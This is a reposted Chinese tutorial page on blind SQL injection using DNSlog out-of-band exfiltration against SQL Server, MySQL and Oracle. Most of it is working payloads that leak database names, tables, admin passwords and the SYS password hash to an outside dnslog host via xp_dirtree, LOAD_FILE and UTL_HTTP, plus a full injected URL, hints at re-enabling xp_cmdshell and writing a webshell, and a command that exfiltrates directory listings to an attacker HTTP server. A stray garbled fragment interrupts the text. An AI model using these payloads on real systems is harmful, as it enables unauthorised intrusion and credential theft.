MyException - 我的异常网
当前位置:我的异常网» SQL » SQL盲注组合dnslog

SQL盲注组合dnslog

www.MyException.Cn  网友分享于:2013-09-17  浏览:0次
SQL盲注结合dnslog

在渗透环境时,我们经常会遇到存在bool注入和延时注入,但是没有回显,此时借助于dnslog平台,可以很好的提升注入效率。

DNSLog 用于监测 DNS 和 HTTP 访问记录,可通过HTTP请求,让目标主机主动请求 DNSLog API 地址,有相应的解析记录,则可判定为存在相应的漏洞。

要使用dnslog辅助注入,首先需要一个dnslog平台,我直接使用某司的dnslog平台。

这个是我的地址,此时,我们在自己电脑ping一下这个地址

可以看到ping的地址最前面的数据直接带入了dnslog的记录。此时就要想办法修改这个位置的数据为动态数据。

DNSlog与SQL注入

SQL Server

存储程序用于获取所有文件夹的列表和给定文件夹内部的子文件夹。

 

DECLARE @host varchar(1024);
注册一个名为@host的变量,类型为varchar。
SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.ceye.io';
获取db_name()然后转换成varchar类型,然后吧获取的db_name()返回值拼接到dnslog平台给我们的子域名里面,然后赋值给@host变量。
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');
列远程主机的foobar$目录,由于是远程主机,所以会做一个dns解析,这样我们的dns平台就能得到日志了
http://xxxx.com.cn/?Id=123';DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.dnslog.link';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--

 

 获取当前数据库名称

DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),db_name())+'.xxxxxxxxx.dnslog.link';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--

 

获取更多数据库名

DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),db_name(1))+'.xxxxxxxxx.dnslog.link';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--
DECLARE @host varchar(1024);SELECT @host=CONVERT(varchar(1024),db_name(2))+'.xxxxxxxxx.dnslog.link';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--
db_name(3),db_name(4).......

 

获取当前数据库的表

DECLARE @host varchar(1024);SELECT @host=(select top 1 name from sysobjects where xtype='u')+'.xxxxxxxxxx.dnslog.link';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--

 

获取更多表,下面只贴出关键词SQL语句

select top 1 name from sysobjects where xtype='u' and name not in ('trace_xe_action_map')
select top 1 name from sysobjects where xtype='u' and name not in ('trace_xe_action_map','trace_xe_event_map')
......

获取指定表的列

select top 1 name from master.dbo.syscolumns where id=object_id('master.dbo.trace_xe_action_map') and name not in ('')

 

获取更多列

select top 1 name from master.dbo.syscolumns where id=object_id('master.dbo.trace_xe_action_map') and name not in ('aaaa')
select top 1 name from master.dbo.syscolumns where id=object_id('master.dbo.trace_xe_action_map') and name not in ('aaaa','bbbbbbb')

 

获取指定数据

select top 1 password from dbo.def_admin_user where 1=1 and  password not in (''))
select top 1 password from dbo.def_admin_user where 1=1 and  password not in ('xxxxxxxxxxx','123','233'))

 

有的时候sysobjects和syscolumns因为某种原因被禁用了或者不能用了,无法获取到表名和列名,可以利用information_schema代替

select top 1 table_name from information_schema.tables

获取更多表名

select top 1 table_name from information_schema.tables where 1=1 and table_name not in ('spt_fallback_db')

 

获取指定表的列(感觉有点像MySQL的information.schema)

select top 1 column_name from information_schema.columns where TABLE_NAME='def_admin_user'

获取更多列

select top 1 column_name from information_schema.columns where TABLE_NAME='def_admin_user' and COLUMN_NAME not in ('name')

 

获取数据

select top 1 user_name from def_admin_user where 1=1
select top 1 user_name from def_admin_user where 1=1 and user_name not in ('admin')

 

有的时候如果是SA权限的话可以尝试恢复xp_cmdshell继续进行渗透,但高版本的mssql默认运行权限是net service,所以这时候想办法搞到网站目录写shell。www.t00ls.net$ V1 {) b% R2 M2 K3 i/ c. E: S, v
+ u  I4 I7 Y# r4 j" k
由于是盲注,目录回显是个大问题,这里参考网上一位大牛的方法,利用http日志来进行列目录

方法首先在远程服务器开启一个http服务,python默认可以做到

python -m SimpleHTTPServer 8888

 

 

开启以后在注射点执行命令(这里以本机演示)

for /F %s in ('dir /ad /b') do start http://ip:8888/%s

 

这条dir命令只会显示文件夹 并以文件名称的形式进行显示,执行完毕后会在远程http记录到访问日志

这种操作完成后打开浏览器,最后不要忘记关掉

taskkill /f /im iexplore.exe

 

参考文章:
https://zhuanlan.zhihu.com/p/23631785

https://www.t00ls.net/viewthread.php?tid=40795&highlight=dnslog

MySQL

 MySQL的函数LOAD_FILE()读取文件内容并将其作为字符串返回:LOAD_FILE()
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM user WHERE user='root' LIMIT 1),'.b182oj.ceye.io\\abc'));

Oracle

UTL-INADDR包用于互联网的寻址–诸如检索本地和远程主机的主机名和IP的地址:

SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

 

参考文章:
http://www.mottoin.com/93274.html

文章评论

亲爱的项目经理,我恨你
亲爱的项目经理,我恨你
那些争议最大的编程观点
那些争议最大的编程观点
我是如何打败拖延症的
我是如何打败拖延症的
为什么程序员都是夜猫子
为什么程序员都是夜猫子
程序员最害怕的5件事 你中招了吗?
程序员最害怕的5件事 你中招了吗?
代码女神横空出世
代码女神横空出世
程序员和编码员之间的区别
程序员和编码员之间的区别
中美印日四国程序员比较
中美印日四国程序员比较
不懂技术不要对懂技术的人说这很容易实现
不懂技术不要对懂技术的人说这很容易实现
当下全球最炙手可热的八位少年创业者
当下全球最炙手可热的八位少年创业者
一个程序员的时间管理
一个程序员的时间管理
Web开发人员为什么越来越懒了?
Web开发人员为什么越来越懒了?
5款最佳正则表达式编辑调试器
5款最佳正则表达式编辑调试器
60个开发者不容错过的免费资源库
60个开发者不容错过的免费资源库
程序员的鄙视链
程序员的鄙视链
我跳槽是因为他们的显示器更大
我跳槽是因为他们的显示器更大
Web开发者需具备的8个好习惯
Web开发者需具备的8个好习惯
程序员周末都喜欢做什么?
程序员周末都喜欢做什么?
总结2014中国互联网十大段子
总结2014中国互联网十大段子
程序员都该阅读的书
程序员都该阅读的书
十大编程算法助程序员走上高手之路
十大编程算法助程序员走上高手之路
要嫁就嫁程序猿—钱多话少死的早
要嫁就嫁程序猿—钱多话少死的早
程序员必看的十大电影
程序员必看的十大电影
聊聊HTTPS和SSL/TLS协议
聊聊HTTPS和SSL/TLS协议
Java程序员必看电影
Java程序员必看电影
什么才是优秀的用户界面设计
什么才是优秀的用户界面设计
每天工作4小时的程序员
每天工作4小时的程序员
如何区分一个程序员是“老手“还是“新手“?
如何区分一个程序员是“老手“还是“新手“?
老程序员的下场
老程序员的下场
初级 vs 高级开发者 哪个性价比更高?
初级 vs 高级开发者 哪个性价比更高?
科技史上最臭名昭著的13大罪犯
科技史上最臭名昭著的13大罪犯
2013年美国开发者薪资调查报告
2013年美国开发者薪资调查报告
做程序猿的老婆应该注意的一些事情
做程序猿的老婆应该注意的一些事情
我的丈夫是个程序员
我的丈夫是个程序员
为啥Android手机总会越用越慢?
为啥Android手机总会越用越慢?
Java 与 .NET 的平台发展之争
Java 与 .NET 的平台发展之争
2013年中国软件开发者薪资调查报告
2013年中国软件开发者薪资调查报告
Google伦敦新总部 犹如星级庄园
Google伦敦新总部 犹如星级庄园
鲜为人知的编程真相
鲜为人知的编程真相
如何成为一名黑客
如何成为一名黑客
看13位CEO、创始人和高管如何提高工作效率
看13位CEO、创始人和高管如何提高工作效率
程序员眼里IE浏览器是什么样的
程序员眼里IE浏览器是什么样的
漫画:程序员的工作
漫画:程序员的工作
10个帮程序员减压放松的网站
10个帮程序员减压放松的网站
“肮脏的”IT工作排行榜
“肮脏的”IT工作排行榜
程序猿的崛起——Growth Hacker
程序猿的崛起——Growth Hacker
团队中“技术大拿”并非越多越好
团队中“技术大拿”并非越多越好
编程语言是女人
编程语言是女人
“懒”出效率是程序员的美德
“懒”出效率是程序员的美德
软件开发程序错误异常ExceptionCopyright © 2009-2015 MyException 版权所有